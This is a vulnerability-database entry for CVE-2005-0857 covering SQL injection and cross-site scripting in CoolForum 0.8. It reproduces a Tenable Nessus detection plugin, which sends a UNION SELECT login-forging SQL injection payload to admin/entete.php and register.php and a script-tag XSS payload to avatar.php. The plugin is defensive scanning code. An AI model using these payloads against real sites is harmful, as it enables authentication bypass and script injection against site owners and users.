Vulnerabilities > CVE-2005-0857 - Cross-Site Scripting And SQL Injection vulnerability in CoolForum

047910
CVSS 4.3 - MEDIUM
Attack vector
NETWORK
Attack complexity
MEDIUM
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
PARTIAL
Availability impact
NONE
network
coolforum
nessus

Summary

Cross-site scripting (XSS) vulnerability in avatar.php for CoolForum 0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the img parameter.

Vulnerable Configurations

Part Description Count
Application
Coolforum
1

Nessus

NASL familyCGI abuses
NASL idCOOLFORUM_XSS_SQL.NASL
descriptionThe remote host is running a version of CoolForum that suffers from multiple input validation vulnerabilities. - Multiple SQL Injection Vulnerabilities Due to a failure to properly sanitize user-input supplied through the
last seen2020-06-01
modified2020-06-02
plugin id17597
published2005-03-22
reporterThis script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/17597
titleCoolForum Multiple Vulnerabilities (SQLi, XSS)
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description) {
  script_id(17597);
  script_version("1.21");

  script_cve_id("CVE-2005-0857", "CVE-2005-0858");
  script_bugtraq_id(12852);

  script_name(english:"CoolForum Multiple Vulnerabilities (SQLi, XSS)");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from
multiple issues." );
 script_set_attribute(attribute:"description", value:
"The remote host is running a version of CoolForum that suffers from
multiple input validation vulnerabilities. 

  - Multiple SQL Injection Vulnerabilities
    Due to a failure to properly sanitize user-input supplied 
    through the 'pseudo' parameter of the 'admin/entete.php' script
    and the 'ilogin' parameter of the 'register.php' script, an
    attacker may be able to manipulate SQL queries and view
    arbitrary database contents provided PHP's 'magic_quotes_gpc'
    setting is disabled.

  - A Cross-Site Scripting Vulnerability
    It is possible to inject arbitrary script and HTML code into the
    'img' parameter of the 'avatar.php' script. An attacker can
    exploit these flaws to cause code to run on a user's browser
    within the context of the remote site, enabling him to steal
    authentication cookies, access data recently submitted by the
    user, and the like." );
 script_set_attribute(attribute:"see_also", value:"http://securitytracker.com/alerts/2005/Mar/1013474.html" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to CoolForum version 0.8.1 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

 script_set_attribute(attribute:"plugin_publication_date", value: "2005/03/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "2005/03/18");
 script_cvs_date("Date: 2018/06/13 18:56:26");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 
  summary["english"] = "Checks for cross-site scripting and SQL injection vulnerabilities in CoolForum";
  script_summary(english:summary["english"]);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
 
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80, php: 1);


foreach dir (cgi_dirs()) {
  # Grab index.php.
  res = http_get_cache(item:string(dir, "/index.php"), port:port, exit_on_fail: 1);

  # If it's CoolForum...
  if (egrep(string:res, pattern:"Powered by .*CoolForum")) {
    # Try the SQL injections.
    #
    # nb: these particular exploits may not be particularly
    #     interesting, but they at least demonstrate the 
    #     install is vulnerable.
    #
    # - requires PHP's magic_quotes to be off.
    postdata = string(
      "action=login&",
      "password=&",
      # nb: this forces a match for id=12345, user "nessus", who has
      #     an empty password and has already been confirmed. It
      #     does not, though, add the user to any databases.
      "pseudo='Union%20SELECT%20'12345','nessus','','','1'%20FROM%20CF_config%23"
    );
    init_cookiejar();
    r = http_send_recv3(method: 'POST', item: dir+"/admin/entete.php", 
 version: 11, data: postdata,  port: port,
 add_headers: make_array("Content-Type", "application/x-www-form-urlencoded"));
    # If we get a CoolForumID cookie, there's a problem.
    if (get_http_cookie(name: "CoolForumID")) {
      security_warning(port);
      set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
    # - only in CoolForum 0.8 and it requires CoolForum's confirmation 
    #   by mail option to be enabled (it is by default).
    r = http_send_recv3(method: 'GET', port: port, exit_on_fail: 1,
 item:string(dir, "/register.php?",
        "action=confirm&",
        # nb: this is an empty string encoded as md5; eg, 'md5("")'.
        "s=d41d8cd98f00b204e9800998ecf8427e&",
        # nb: this forces a match for id=12345, user "nessus", who has
        #     an empty password and has already been confirmed. It
        #     does not, though, add the user to any databases.
        "login='Union%20SELECT%20'12345','nessus','','','1'%20FROM%20CF_config%23"
      ));
    # If the response indicates we've already confirmed, there's a problem.
    if (egrep(string: r[2], pattern:"<b>Op.+ration impossible, votre inscription a d.j. .t. confirm.e!</b>")) {
      security_warning(port);
      set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }

    # Try an XSS exploit - a simple alert to display "Nessus was here".
    #
    # nb: this requires PHP's display_errors to be enabled.
    xss = "'><script>alert('Nessus was here');</script>";
    # nb: the url-encoded version is what we need to pass in.
    exss = "'%3E%3Cscript%3Ealert('Nessus%20was%20here')%3B%3C%2Fscript%3E";
    r = http_send_recv3(port: port, method: 'GET', item:string(dir, "/avatar.php?img=", exss), exit_on_fail: 1);
    # If we see our XSS, there's a problem.
    if (egrep(string: r[2], pattern:xss)) {
      security_warning(port);
      set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);
      set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);
      exit(0);
    }
  }
}